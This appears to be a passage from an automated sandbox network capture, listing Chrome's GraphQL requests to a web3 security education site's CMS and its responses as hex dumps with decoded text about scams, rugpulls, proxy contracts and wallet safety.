                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 727
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC727OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 53 75 70 70 6f 72 74 4f 70 74 69 6f 6e 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 70 61 67 65 22 3a 31 2c 22 70 61 67 65 53 69 7a 65 22 3a 31 32 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 53 75 70 70 6f 72 74 4f 70 74 69 6f 6e 73 28 24 70 61 67 65 3a 20 49 6e 74 2c 20 24 70 61 67 65 53 69 7a 65 3a 20 49 6e 74 2c 20 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 73 75 70 70 6f 72 74 4f 70 74 69 6f 6e 73 28 70 61 67 69 6e 61 74 69 6f 6e 3a 20 7b 70 61 67 65 3a 20 24 70 61 67 65 2c 20 70 61 67 65 53 69 7a 65 3a 20 24 70 61 67 65 53 69 7a 65 7d 2c 20 6c 6f 63 61 6c 65 3a 20 24 6c 6f 63 61
                                                                          Data Ascii: {"operationName":"GetSupportOptions","variables":{"page":1,"pageSize":12,"locale":"en"},"query":"query GetSupportOptions($page: Int, $pageSize: Int, $locale: I18NLocaleCode) {\n supportOptions(pagination: {page: $page, pageSize: $pageSize}, locale: $loca
                                                                          2023-12-10 16:44:52 UTC1028INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 37 37 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTContent-Type: application/jsonContent-Length: 5778Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: t
                                                                          2023-12-10 16:44:52 UTC5778INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 73 75 70 70 6f 72 74 4f 70 74 69 6f 6e 73 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 70 61 67 69 6e 61 74 69 6f 6e 22 3a 7b 22 74 6f 74 61 6c 22 3a 34 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 50 61 67 69 6e 61 74 69 6f 6e 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 73 70 6f 6e 73 65 43 6f 6c 6c 65 63 74 69 6f 6e 4d 65 74 61 22 7d 2c 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 31 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 43 6f 6e 74 72 69 62 75 74 65 20 69 6e 20 53 69 6d 70 6c 65 20 57 61 79 73 20 26 20 47 65 74 20 52 65 77 61 72 64 65 64 22 2c 22 6c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 2e 74 68 72 69 76 65 63 6f 69 6e 2e 63 6f 6d 2f 73 65 61 73 6f 6e 73 2f 62 6f 72 69
                                                                          Data Ascii: {"data":{"supportOptions":{"meta":{"pagination":{"total":4,"__typename":"Pagination"},"__typename":"ResponseCollectionMeta"},"data":[{"id":"1","attributes":{"title":"Contribute in Simple Ways & Get Rewarded","link":"https://app.thrivecoin.com/seasons/bori


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          120192.168.2.54985323.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC618OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1743
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC1743OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 41 72 74 69 63 6c 65 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 70 61 67 65 22 3a 31 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 70 61 67 65 53 69 7a 65 22 3a 36 2c 22 73 6f 72 74 22 3a 5b 22 63 72 65 61 74 65 64 41 74 3a 64 65 73 63 22 5d 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 41 72 74 69 63 6c 65 73 28 24 70 61 67 65 3a 20 49 6e 74 2c 20 24 70 61 67 65 53 69 7a 65 3a 20 49 6e 74 2c 20 24 63 61 74 65 67 6f 72 79 3a 20 49 44 2c 20 24 73 6f 72 74 3a 20 5b 53 74 72 69 6e 67 5d 2c 20 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 61 72 74 69 63 6c 65 73 28 5c 6e 20 20 20 20 73 6f 72 74 3a 20 24 73 6f 72 74 5c 6e 20 20 20
                                                                          Data Ascii: {"operationName":"GetArticles","variables":{"page":1,"locale":"en","pageSize":6,"sort":["createdAt:desc"]},"query":"query GetArticles($page: Int, $pageSize: Int, $category: ID, $sort: [String], $locale: I18NLocaleCode) {\n articles(\n sort: $sort\n
                                                                          2023-12-10 16:44:52 UTC1030INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 31 30 39 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTContent-Type: application/jsonContent-Length: 141093Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials:
                                                                          2023-12-10 16:44:52 UTC15354INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 61 72 74 69 63 6c 65 73 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 70 61 67 69 6e 61 74 69 6f 6e 22 3a 7b 22 74 6f 74 61 6c 22 3a 32 32 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 50 61 67 69 6e 61 74 69 6f 6e 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 73 70 6f 6e 73 65 43 6f 6c 6c 65 63 74 69 6f 6e 4d 65 74 61 22 7d 2c 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 39 35 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 55 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 49 6e 74 65 72 6e 61 6c 20 54 72 61 6e 73 61 63 74 69 6f 6e 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 6f 73 74 20 73 6b 69 70 20 74 68 65 20 49 6e 74 65 72 6e 61 6c 20 54 72 61 6e 73 61 63 74 69 6f 6e 73 20 74 61 62 20 69
                                                                          Data Ascii: {"data":{"articles":{"meta":{"pagination":{"total":22,"__typename":"Pagination"},"__typename":"ResponseCollectionMeta"},"data":[{"id":"95","attributes":{"title":"Understanding Internal Transactions","description":"Most skip the Internal Transactions tab i
                                                                          2023-12-10 16:44:52 UTC16384INData Raw: 74 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 5c 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 70 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 35 35 2c 36 35 2c 38 31 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 26 71 75 6f 74 3b 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 26 71 75 6f 74 3b 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 5c 22 3e 3c 69 3e 48 61 76 65 20 61 6e 79 20 71 75 65 73 74 69 6f 6e 73 20 6f 72 20 77 61 6e 74 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 77 65 62 33 20 73 65 63 75
                                                                          Data Ascii: t;color:#000000;font-family:Arial,sans-serif;\">&nbsp;</span></li></ul><p><span style=\"background-color:rgb(255,255,255);color:rgb(55,65,81);font-family:&quot;Helvetica Neue&quot;, sans-serif;\"><i>Have any questions or want to learn more about web3 secu
                                                                          2023-12-10 16:44:53 UTC16384INData Raw: 69 6e 63 69 70 6c 65 20 6f 66 20 4c 65 61 73 74 20 50 72 69 76 69 6c 65 67 65 20 69 6e 20 50 72 61 63 74 69 63 65 3c 2f 68 32 3e 3c 68 33 20 73 74 79 6c 65 3d 5c 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 5c 22 3e 52 65 73 74 72 69 63 74 20 44 61 6e 67 65 72 6f 75 73 20 50 65 72 6d 69 73 73 69 6f 6e 73 3c 2f 68 33 3e 3c 70 20 73 74 79 6c 65 3d 5c 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 5c 22 3e 53 63 61 6d 6d 65 72 73 20 61 69 6d 20 74 6f 20 73 70 72 65 61 64 20 70 68 69 73 68 69 6e 67 20 6c 69 6e 6b 73 20 71 75 69 63 6b 6c 79 2c 20 6f 66 74 65 6e 20 62 79 20 63 6f 6d 70 72 6f 6d 69 73 69 6e 67 20 75 73 65 72 20 61 63 63 6f 75 6e 74 73 20 77 69 74 68 69 6e 20 79 6f 75 72 20 73 65 72 76 65 72 2e 20 54 6f 20 70 72 6f 74 65 63 74 20 61 67
                                                                          Data Ascii: inciple of Least Privilege in Practice</h2><h3 style=\"margin-left:0px;\">Restrict Dangerous Permissions</h3><p style=\"margin-left:0px;\">Scammers aim to spread phishing links quickly, often by compromising user accounts within your server. To protect ag
                                                                          2023-12-10 16:44:53 UTC16384INData Raw: 73 20 61 6e 64 20 74 68 65 6e 20 73 75 64 64 65 6e 6c 79 20 64 69 73 63 6f 6e 74 69 6e 75 69 6e 67 20 74 68 65 20 70 72 6f 6a 65 63 74 2c 20 72 65 6e 64 65 72 69 6e 67 20 74 68 65 20 4e 46 54 73 20 65 73 73 65 6e 74 69 61 6c 6c 79 20 77 6f 72 74 68 6c 65 73 73 2e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 70 20 73 74 79 6c 65 3d 5c 22 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 3b 5c 22 3e 3c 62 72 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 5c 22 3e 3c 73 74 72 6f 6e 67 3e 3c 75 3e 54 59 50 45 53 20 4f 46 20 52 55 47 50 55 4c 4c 53 3c 2f 75 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 70 20 73 74 79 6c 65 3d 5c 22 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 3b 5c 22
                                                                          Data Ascii: s and then suddenly discontinuing the project, rendering the NFTs essentially worthless.</span></p><p style=\"text-align:justify;\"><br><span style=\"font-family:Arial;\"><strong><u>TYPES OF RUGPULLS</u></strong></span></p><p style=\"text-align:justify;\"
                                                                          2023-12-10 16:44:53 UTC16384INData Raw: 65 78 70 65 63 74 65 64 20 74 72 61 6e 73 66 65 72 73 2e 20 59 6f 75 20 63 61 6e 20 64 6f 20 73 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 6f 6c 20 73 74 79 6c 65 3d 5c 22 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 5c 22 3e 3c 6c 69 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 5c 22 3e 3c 73 74 72 6f 6e 67 3e 49 64 65 6e 74 69 66 79 20 74 68 65 20 4e 46 54 20 6f 6e 20 61 20 74 72 75 73 74 65 64 20 6d 61 72 6b 65 74 70 6c 61 63 65 2e 26 6e 62 73 70 3b 3c 2f 73 74 72 6f 6e 67 3e 42 61 73 69 63 20 64 65 74 61 69 6c 73 20 73 75 63 68 20 61 73 20 63 75 72 72 65 6e 74 20 61 6e 64 20 70 72 65 76 69 6f 75 73 20 68 6f
                                                                          Data Ascii: expected transfers. You can do so through the following:</span></p><ol style=\"list-style-type:decimal;\"><li><span style=\"font-family:Arial;\"><strong>Identify the NFT on a trusted marketplace.&nbsp;</strong>Basic details such as current and previous ho
                                                                          2023-12-10 16:44:53 UTC16384INData Raw: 67 3e 55 70 67 72 61 64 61 62 69 6c 69 74 79 3a 3c 2f 73 74 72 6f 6e 67 3e 20 54 68 69 73 20 69 73 20 74 68 65 20 70 72 69 6d 61 72 79 20 72 65 61 73 6f 6e 2e 20 54 68 65 20 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 20 63 6f 6e 74 72 61 63 74 20 63 61 6e 20 62 65 20 75 70 67 72 61 64 65 64 20 77 69 74 68 6f 75 74 20 61 66 66 65 63 74 69 6e 67 20 74 68 65 20 70 72 6f 78 79 20 63 6f 6e 74 72 61 63 74 20 6f 72 20 75 73 65 72 73 2e 20 50 72 6f 6a 65 63 74 73 20 64 6f 6e e2 80 99 74 20 77 61 6e 74 20 74 6f 20 6c 6f 73 65 20 75 73 65 72 73 20 62 79 20 72 65 71 75 69 72 69 6e 67 26 6e 62 73 70 3b 20 74 68 65 6d 20 74 6f 20 72 65 2d 61 70 70 72 6f 76 65 20 61 6c 72 65 61 64 79 20 65 78 69 73 74 69 6e 67 20 61 73 73 65 74 73 2c 20 6d 69 67 72 61 74 65 20 66 75 6e
                                                                          Data Ascii: g>Upgradability:</strong> This is the primary reason. The implementation contract can be upgraded without affecting the proxy contract or users. Projects dont want to lose users by requiring&nbsp; them to re-approve already existing assets, migrate fun
                                                                          2023-12-10 16:44:53 UTC16384INData Raw: 73 63 6f 72 64 2e 67 67 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3c 2f 75 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 63 6f 6c 6f 72 3a 23 33 37 34 31 35 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 5c 22 3e 3c 69 3e 20 2e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 22 2c 22 72 65 61 64 69 6e 67 54 69 6d 65 22 3a 22 38 20 6d 69 6e 75 74 65 73 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 31 33 54 30 31 3a 30 36 3a 30 37 2e 33 32 36 5a 22 2c 22 73 6c 75 67 22 3a 22 61 6c 6c 2d 61 62 6f 75 74 2d 70 72 6f 78 79 2d 63 6f 6e 74 72 61 63 74 73 22 2c 22 6c 6f 63 61 6c
                                                                          Data Ascii: scord.gg/boringsecurity</u></i></span></a><span style=\"background-color:#ffffff;color:#374151;font-family:Arial,sans-serif;\"><i> .</i></span></p>","readingTime":"8 minutes","createdAt":"2023-06-13T01:06:07.326Z","slug":"all-about-proxy-contracts","local
                                                                          2023-12-10 16:44:53 UTC16384INData Raw: 69 64 65 20 6f 66 20 62 65 69 6e 67 20 63 61 72 65 66 75 6c 20 61 62 6f 75 74 20 77 68 61 74 20 79 6f 75 20 73 69 67 6e 2c 20 79 6f 75 20 73 68 6f 75 6c 64 20 61 6c 73 6f 20 70 72 61 63 74 69 63 65 20 67 6f 6f 64 20 3c 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 65 64 67 65 72 2e 63 6f 6d 2f 61 63 61 64 65 6d 79 2f 73 65 67 72 65 67 61 74 65 2d 63 72 79 70 74 6f 2d 61 73 73 65 74 73 5c 22 3e 3c 75 3e 61 73 73 65 74 20 73 65 67 72 65 67 61 74 69 6f 6e 3c 2f 75 3e 3c 2f 61 3e 2e 20 53 69 6e 63 65 20 6f 6e 6c 79 20 74 68 65 20 4e 46 54 73 20 79 6f 75 e2 80 99 76 65 20 61 70 70 72 6f 76 65 64 20 74 6f 20 4f 70 65 6e 53 65 61 20 6f 72 20 6f 74 68 65 72 20 6d 61 72 6b 65 74 70 6c 61 63 65 73 20 61 72 65 20 76 75 6c 6e 65 72 61 62 6c 65 20
                                                                          Data Ascii: ide of being careful about what you sign, you should also practice good <a href=\"https://www.ledger.com/academy/segregate-crypto-assets\"><u>asset segregation</u></a>. Since only the NFTs youve approved to OpenSea or other marketplaces are vulnerable


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          121192.168.2.54985423.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 322
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC322OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 43 61 74 65 67 6f 72 69 65 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 43 61 74 65 67 6f 72 69 65 73 28 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 63 61 74 65 67 6f 72 69 65 73 28 6c 6f 63 61 6c 65 3a 20 24 6c 6f 63 61 6c 65 29 20 7b 5c 6e 20 20 20 20 64 61 74 61 20 7b 5c 6e 20 20 20 20 20 20 69 64 5c 6e 20 20 20 20 20 20 61 74 74 72 69 62 75 74 65 73 20 7b 5c 6e 20 20 20 20 20 20 20 20 6e 61 6d 65 5c 6e 20 20 20 20 20 20 20 20 64 65 73 63 72 69 70 74 69 6f 6e 5c 6e 20 20 20 20 20 20 20 20 6c 6f 63 61 6c 65 5c 6e 20 20 20 20 20 20 20 20 5f 5f 74
                                                                          Data Ascii: {"operationName":"GetCategories","variables":{"locale":"en"},"query":"query GetCategories($locale: I18NLocaleCode) {\n categories(locale: $locale) {\n data {\n id\n attributes {\n name\n description\n locale\n __t
                                                                          2023-12-10 16:44:52 UTC1028INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 36 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTContent-Type: application/jsonContent-Length: 1261Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: t
                                                                          2023-12-10 16:44:52 UTC1261INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 32 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 53 63 61 6d 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 6f 6d 65 74 68 69 6e 67 20 61 62 6f 75 74 20 53 63 61 6d 73 22 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 61 74 65 67 6f 72 79 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 61 74 65 67 6f 72 79 45 6e 74 69 74 79 22 7d 2c 7b 22 69 64 22 3a 22 33 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 57 61 6c 6c 65 74 20 53 65 63 75 72 69 74 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 6f 6d 65 74 68 69 6e 67 20 61 62 6f
                                                                          Data Ascii: {"data":{"categories":{"data":[{"id":"2","attributes":{"name":"Scams","description":"Something about Scams","locale":"en","__typename":"Category"},"__typename":"CategoryEntity"},{"id":"3","attributes":{"name":"Wallet Security","description":"Something abo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          122192.168.2.54985523.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 708
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC708OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 53 68 6f 70 49 74 65 6d 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 70 61 67 65 22 3a 31 2c 22 70 61 67 65 53 69 7a 65 22 3a 31 32 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 53 68 6f 70 49 74 65 6d 73 28 24 70 61 67 65 3a 20 49 6e 74 2c 20 24 70 61 67 65 53 69 7a 65 3a 20 49 6e 74 2c 20 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 73 68 6f 70 73 28 70 61 67 69 6e 61 74 69 6f 6e 3a 20 7b 70 61 67 65 3a 20 24 70 61 67 65 2c 20 70 61 67 65 53 69 7a 65 3a 20 24 70 61 67 65 53 69 7a 65 7d 2c 20 6c 6f 63 61 6c 65 3a 20 24 6c 6f 63 61 6c 65 29 20 7b 5c 6e 20 20 20 20 6d 65 74 61 20 7b 5c 6e
                                                                          Data Ascii: {"operationName":"GetShopItems","variables":{"page":1,"pageSize":12,"locale":"en"},"query":"query GetShopItems($page: Int, $pageSize: Int, $locale: I18NLocaleCode) {\n shops(pagination: {page: $page, pageSize: $pageSize}, locale: $locale) {\n meta {\n
